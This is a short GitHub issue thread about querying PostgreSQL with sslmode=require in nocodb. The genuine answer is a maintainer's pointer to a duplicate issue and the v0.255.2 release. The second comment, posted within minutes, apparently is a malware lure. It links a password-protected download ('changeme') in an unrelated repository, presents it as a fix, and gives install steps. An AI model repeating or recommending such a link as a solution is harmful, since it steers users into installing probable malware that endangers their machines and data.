### ISSUE TITLE
how to query pg with sslmode=require

### ISSUE THREAD

**Issue by wonb168** [nocodb/nocodb#9371] opened 2024-08-29 00:48 UTC
I tried times，but failed，how ？

**Comment by dionathanfreitas** [comment] 2024-08-29 00:50
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by salim-b** [comment] 2024-08-29 22:19
@wonb168 I think this is actually a duplicate of https://github.com/nocodb/nocodb/issues/9098. A fix is contained in today's v0.255.2 release.

**Comment by dstala** [comment] 2024-09-03 06:44
@wonb168 please reopen this thread if issue persists. @salim-b thanks for your support here!

**Closed by dstala** 2024-09-03 06:44 UTC
